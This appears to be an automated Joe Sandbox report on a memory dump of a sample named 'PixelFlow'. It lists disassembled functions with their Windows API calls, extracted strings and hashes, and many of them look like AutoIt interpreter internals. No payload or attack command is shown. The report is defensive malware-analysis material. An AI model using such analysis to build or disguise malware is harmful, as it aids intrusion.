Opcode Fuzzy Hash: 00723d8d4f54147c24f9f4fc854b4e844324200b62a4eee2bc58d71947c797db
Instruction Fuzzy Hash: 6B81BF71004205AFDB04DF10C881FAA7BEEFF85315F04A46AFE898A192DB30DD49CBA1

Function 0068CA21 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

DragQueryPoint.SHELL32(?,?), ref: 0068CA4A

Part of subcall function 0068AF24: ClientToScreen.USER32(?,?), ref: 0068AF4D
Part of subcall function 0068AF24: GetWindowRect.USER32(?,?), ref: 0068AFC3
Part of subcall function 0068AF24: PtInRect.USER32(?,?,0068C437), ref: 0068AFD3

SendMessageW.USER32(?,000000B0,?,?), ref: 0068CAB3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068CABE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068CAE1
_wcscat.LIBCMT ref: 0068CB11
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068CB28
SendMessageW.USER32(?,000000B0,?,?), ref: 0068CB41
SendMessageW.USER32(?,000000B1,?,?), ref: 0068CB58
SendMessageW.USER32(?,000000B1,?,?), ref: 0068CB7A
DragFinish.SHELL32(?), ref: 0068CB81
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068CC74

Strings

prl, xrefs: 0068CBBE
@GUI_DROPID, xrefs: 0068CBA1
@GUI_DRAGID, xrefs: 0068CBEC
@GUI_DRAGFILE, xrefs: 0068CC23

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prl
API String ID: 169749273-2548919611
Opcode ID: 596f69c2ebfe6353104f158ad7067491f6f2a509c6093d55c927bb9b8f0e2d48
Instruction ID: 70a689a7c5e082b677e9ae607184276d591e9719ce434d4ed38438c05b8d6897
Opcode Fuzzy Hash: 596f69c2ebfe6353104f158ad7067491f6f2a509c6093d55c927bb9b8f0e2d48
Instruction Fuzzy Hash: 2B61AEB1108301AFD751EF50DC85DAFBBFAEF89750F000A1EF695921A1DB309A49CB66

Function 0065B699 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0065B6F8

Strings

REGEXP=, xrefs: 0065B70D
[HANDLE:, xrefs: 0065B704
ACTIVE, xrefs: 0065B6D3
[LAST, xrefs: 0065B7A5
LAST, xrefs: 0065B6BD
[ALL, xrefs: 0065B79E
HANDLE=, xrefs: 0065B6F1
CLASSNAME=, xrefs: 0065B735
[REGEXPTITLE:, xrefs: 0065B720
[ACTIVE, xrefs: 0065B6E5
[CLASS:, xrefs: 0065B748
ALL, xrefs: 0065B78C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 6c581ae047705a2d0339985b3107349e217f4918c1f5e96306eb02623c6c986c
Instruction ID: 0a8969bfc8ccc10daa1d2885ce3af3a5f954c6765db0cab19649cff884a3be3f
Opcode Fuzzy Hash: 6c581ae047705a2d0339985b3107349e217f4918c1f5e96306eb02623c6c986c
Instruction Fuzzy Hash: A3310170A40205AADB50EB60CC43EED73ABAF15352F20012EF901B71D2EF656E88CB58

Function 0065C97A Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0065C98D
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0065C99F
SetWindowTextW.USER32(?,?), ref: 0065C9B6
GetDlgItem.USER32(?,000003EA), ref: 0065C9CB
SetWindowTextW.USER32(00000000,?), ref: 0065C9D1
GetDlgItem.USER32(?,000003E9), ref: 0065C9E1
SetWindowTextW.USER32(00000000,?), ref: 0065C9E7
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0065CA08
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0065CA22
GetWindowRect.USER32(?,?), ref: 0065CA2B
SetWindowTextW.USER32(?,?), ref: 0065CA96
GetDesktopWindow.USER32 ref: 0065CA9C
GetWindowRect.USER32(00000000), ref: 0065CAA3
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0065CAEF
GetClientRect.USER32(?,?), ref: 0065CAFC
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0065CB21
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0065CB4C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: c1625ad354e20eb8caf191f23bd7afe7f15dcfeb876191995dfe6545c9194be3
Instruction ID: fda6bdb737dff77430ec124e36bae5a01fe70d9e311e24a39d62551b37f7c992
Opcode Fuzzy Hash: c1625ad354e20eb8caf191f23bd7afe7f15dcfeb876191995dfe6545c9194be3
Instruction Fuzzy Hash: 7E515031900709EFEB20DFA8CD85BAEBBFAFF04715F004519E946A2AA0C774A955CB50

Function 006754AD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 006754C3
LoadCursorW.USER32(00000000,00007F00), ref: 006754CE
LoadCursorW.USER32(00000000,00007F03), ref: 006754D9
LoadCursorW.USER32(00000000,00007F8B), ref: 006754E4
LoadCursorW.USER32(00000000,00007F01), ref: 006754EF
LoadCursorW.USER32(00000000,00007F81), ref: 006754FA
LoadCursorW.USER32(00000000,00007F88), ref: 00675505
LoadCursorW.USER32(00000000,00007F80), ref: 00675510
LoadCursorW.USER32(00000000,00007F86), ref: 0067551B
LoadCursorW.USER32(00000000,00007F83), ref: 00675526
LoadCursorW.USER32(00000000,00007F85), ref: 00675531
LoadCursorW.USER32(00000000,00007F82), ref: 0067553C
LoadCursorW.USER32(00000000,00007F84), ref: 00675547
LoadCursorW.USER32(00000000,00007F04), ref: 00675552
LoadCursorW.USER32(00000000,00007F02), ref: 0067555D
LoadCursorW.USER32(00000000,00007F89), ref: 00675568
GetCursorInfo.USER32(?), ref: 00675578

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: d8e5d67892018dba8411c6338517a025ddaee3c945e8d4e5eb34061941fb633b
Instruction ID: 6818007ea53720cf4f620fbab5cf408d58e06b56a2fe1fe33478df07b39c5354
Opcode Fuzzy Hash: d8e5d67892018dba8411c6338517a025ddaee3c945e8d4e5eb34061941fb633b
Instruction Fuzzy Hash: B23129B0D4831A6ADF509FB68C8999FBFE9FF04750F50452AE50DE7280DB78A5008F91

Function 0068A5A6 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068A646
DestroyWindow.USER32(00000000,?), ref: 0068A6C0

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068A73A
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068A75C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A76F
DestroyWindow.USER32(00000000), ref: 0068A791
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0068A7C8
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A7E1
GetDesktopWindow.USER32 ref: 0068A7FA
GetWindowRect.USER32(00000000), ref: 0068A801
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068A819
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068A831

Part of subcall function 006029AB: GetWindowLongW.USER32(?,000000EB), ref: 006029BC

Strings

0, xrefs: 0068A65C
tooltips_class32, xrefs: 0068A733, 0068A7C1

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: d978771d4dd1896e58d7d371bd68c4531a03eb3180221b61d8f89733c998f7fe
Instruction ID: 9fbcc05791e3c5026aaeb7363c5fbd94c1bea99df3d4dc34d05095185b10e1b1
Opcode Fuzzy Hash: d978771d4dd1896e58d7d371bd68c4531a03eb3180221b61d8f89733c998f7fe
Instruction Fuzzy Hash: AD71ACB1140201AFE721DF68CC48FA67BEAFB89304F04461EF985873A1D770E902CB66

Function 00668142 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00668187
VariantCopy.OLEAUT32(00000000,?), ref: 00668190
VariantClear.OLEAUT32(00000000), ref: 0066819C
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0066828A
__swprintf.LIBCMT ref: 006682BA
VarR8FromDec.OLEAUT32(?,?), ref: 006682E6
VariantInit.OLEAUT32(?), ref: 00668397
SysFreeString.OLEAUT32(?), ref: 0066842B
VariantClear.OLEAUT32(?), ref: 00668485
VariantClear.OLEAUT32(?), ref: 00668494
VariantInit.OLEAUT32(00000000), ref: 006684D2

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 006682B4
Default, xrefs: 00668347

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 8b41b60aa209d3d6a293c3321ff42a871c2584b3f5c39ab6b0515a6092e9fdf2
Instruction ID: 8c136affc54f8027fbf1f13c4b1012f02908628143a44669fe012d16390a3658
Opcode Fuzzy Hash: 8b41b60aa209d3d6a293c3321ff42a871c2584b3f5c39ab6b0515a6092e9fdf2
Instruction Fuzzy Hash: C7D1E070600A16DFEB209F75D844BA9F7F6BF46700F148659E905AB281DF30EC46DBA1

Function 00684797 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00684829
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00684874

Strings

COLLAPSE, xrefs: 006848BA
SELECT, xrefs: 00684A25
ISCHECKED, xrefs: 006849F7
EXISTS, xrefs: 006848DD
GETTEXT, xrefs: 006849C7
GETTOTALCOUNT, xrefs: 0068485B
CHECK, xrefs: 00684894
UNCHECK, xrefs: 00684A50
EXPAND, xrefs: 00684926
GETSELECTED, xrefs: 00684984
GETITEMCOUNT, xrefs: 00684956

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 046fd9ccc8e277c1122dd9775a356517de9edde4ba03f61b87eba864d82e37f4
Instruction ID: f29b456aa05aff9d21be56b38b14045ecb1004413255c334fbdb647b8100542e
Opcode Fuzzy Hash: 046fd9ccc8e277c1122dd9775a356517de9edde4ba03f61b87eba864d82e37f4
Instruction Fuzzy Hash: 079170B02447029FCB58EF10C451AAAB7A7AF94354F048A5CF8965B3D2CF31ED4ACB85

Function 0068BBEB Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068BCA1
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006895AF), ref: 0068BCFD
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068BD36
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0068BD79
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068BDB0
FreeLibrary.KERNEL32(?), ref: 0068BDBC
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068BDCC
DestroyIcon.USER32(?,?,?,?,?,006895AF), ref: 0068BDDB
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068BDF8
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068BE04

Part of subcall function 0062305F: __wcsicmp_l.LIBCMT ref: 006230E8

Strings

.exe, xrefs: 0068BC37
.dll, xrefs: 0068BC5A
.icl, xrefs: 0068BC17

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 162825cd3f0b1bce60eb193def321cfad037e4ba9383b0eaab0fb718b4056adf
Instruction ID: 100472b3359fe0e97594b911fb1f0c4f73ba5df9661c131674741c24fa8358c0
Opcode Fuzzy Hash: 162825cd3f0b1bce60eb193def321cfad037e4ba9383b0eaab0fb718b4056adf
Instruction Fuzzy Hash: 7E61EEB1500615BEEB14EF64DC41BFE77AEEF04710F10560AF915DA2D1DBB4AA90CBA0

Function 006023F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00601F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602412,?,00000000,?,?,?,?,00601AA7,00000000,?), ref: 00601F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006024AF
KillTimer.USER32(-00000001,?,?,?,?,00601AA7,00000000,?,?,00601EBE,?,?), ref: 0060254A
DestroyAcceleratorTable.USER32(00000000), ref: 0063BF17
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00601AA7,00000000,?,?,00601EBE,?,?), ref: 0063BF48
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00601AA7,00000000,?,?,00601EBE,?,?), ref: 0063BF5F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00601AA7,00000000,?,?,00601EBE,?,?), ref: 0063BF7B
DeleteObject.GDI32(00000000), ref: 0063BF8D

Strings

hi, xrefs: 0060256F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: hi
API String ID: 641708696-1546199359
Opcode ID: 76163a662efe8a04b3a5f63b107cf790efd2a68e579ccb7925dcd3be696bb99d
Instruction ID: 6f597538b0247d5cc6c9a24d1cb2483a2dc1792264a1520b67a0cc140a64161c
Opcode Fuzzy Hash: 76163a662efe8a04b3a5f63b107cf790efd2a68e579ccb7925dcd3be696bb99d
Instruction Fuzzy Hash: 5B61A731141612DFDB299F14DD68B7AB7F3FF40316F10A52DE0425AAA0C771A891DFA8

Function 0066A0E8 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0066A12F

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0066A150
__swprintf.LIBCMT ref: 0066A1A9
__swprintf.LIBCMT ref: 0066A1C2
_wprintf.LIBCMT ref: 0066A269
_wprintf.LIBCMT ref: 0066A287

Strings

Error: , xrefs: 0066A231
"%s" (%d) : ==> %s:%s%s, xrefs: 0066A264
Incorrect parameters to object property !, xrefs: 0066A20B
^ ERROR , xrefs: 0066A1FE
"%s" (%d) : ==> %s:, xrefs: 0066A282
Line %d (File "%s"):, xrefs: 0066A1A3, 0066A1BC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 56d2eb467546fb0fc48ccd96c47137bbdfb5efe19c742f47d6de118318d45b5b
Instruction ID: 9f05a735a6286378e4c4e6b94968a95ef9b1fffbf027cdd8e829ff9f9f55c269
Opcode Fuzzy Hash: 56d2eb467546fb0fc48ccd96c47137bbdfb5efe19c742f47d6de118318d45b5b
Instruction Fuzzy Hash: 2B51BF71940119AACF55EBE0CD52EEEB77BAF05340F140129F605B21A2DB352F98CF69

Function 0066A802 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

CharLowerBuffW.USER32(?,?), ref: 0066A87B
GetDriveTypeW.KERNEL32 ref: 0066A8C8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A910
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A947
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A975

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Strings

type cdaudio alias cd wait, xrefs: 0066A8F3
open , xrefs: 0066A8D7
open, xrefs: 0066A8A2
set cd door , xrefs: 0066A916
close, xrefs: 0066A881
close cd wait, xrefs: 0066A960
wait, xrefs: 0066A932
closed, xrefs: 0066A88F, 0066A898

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 9e5d979527eabf3ae297b76936d1ecd486558ab91a2b1462bada781ff38138ac
Instruction ID: 35e69bb656faa3d6e355cdabc1ecd6d9e4dac09aac52f1321f2a2068f846fd3d
Opcode Fuzzy Hash: 9e5d979527eabf3ae297b76936d1ecd486558ab91a2b1462bada781ff38138ac
Instruction Fuzzy Hash: 60518FB11043059FC740EF10C8819AAB7EAFF85358F14891DF995A7292DB31ED45CF96

Function 0066A69F Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066A6BF
__swprintf.LIBCMT ref: 0066A6E1
CreateDirectoryW.KERNEL32(?,00000000), ref: 0066A71E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066A743
_memset.LIBCMT ref: 0066A762
_wcsncpy.LIBCMT ref: 0066A79E
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066A7D3
CloseHandle.KERNEL32(00000000), ref: 0066A7DE
RemoveDirectoryW.KERNEL32(?), ref: 0066A7E7
CloseHandle.KERNEL32(00000000), ref: 0066A7F1

Strings

\??\%s, xrefs: 0066A6DB
:, xrefs: 0066A702
\, xrefs: 0066A6F7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 483a16c21f43af198b88ca429d1113506d6624bf30dca2563e5c8fbc9271e5a3
Instruction ID: dda801f2bb4e3a91a4a085c68e7d6161fc0205ca56ea2c737adcdf9e68507c75
Opcode Fuzzy Hash: 483a16c21f43af198b88ca429d1113506d6624bf30dca2563e5c8fbc9271e5a3
Instruction Fuzzy Hash: 9D31B67550011AABDB209FA0DC49FEB37BEEF89700F1041BAF909E6160E77097858F25

Function 0068C5CF Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068C61F
GetFocus.USER32 ref: 0068C62F
GetDlgCtrlID.USER32(00000000), ref: 0068C63A
_memset.LIBCMT ref: 0068C765
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0068C790
GetMenuItemCount.USER32(?), ref: 0068C7B0
GetMenuItemID.USER32(?,00000000), ref: 0068C7C3
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0068C7F7
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0068C83F
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068C877
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068C8AC

Strings

0, xrefs: 0068C75D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
